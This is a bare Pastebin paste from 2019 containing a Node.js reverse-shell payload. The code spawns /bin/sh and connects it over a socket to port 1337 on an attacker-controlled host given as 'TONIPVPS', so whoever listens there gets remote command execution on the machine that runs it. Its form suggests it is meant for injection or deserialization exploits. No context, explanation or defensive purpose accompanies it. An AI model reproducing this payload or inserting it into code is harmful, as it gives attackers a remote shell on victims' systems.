Advertisement
Guest User

Untitled

a guest
Apr 18th, 2019
94
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.33 KB | None | 0 0
  1. (function(){
  2. var net = require("net"),
  3. cp = require("child_process"),
  4. sh = cp.spawn("/bin/sh", []);
  5. var client = new net.Socket();
  6. client.connect(1337, "TONIPVPS", function(){
  7. client.pipe(sh.stdin);
  8. sh.stdout.pipe(client);
  9. sh.stderr.pipe(client);
  10. });
  11. return /a/;
  12. })();
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement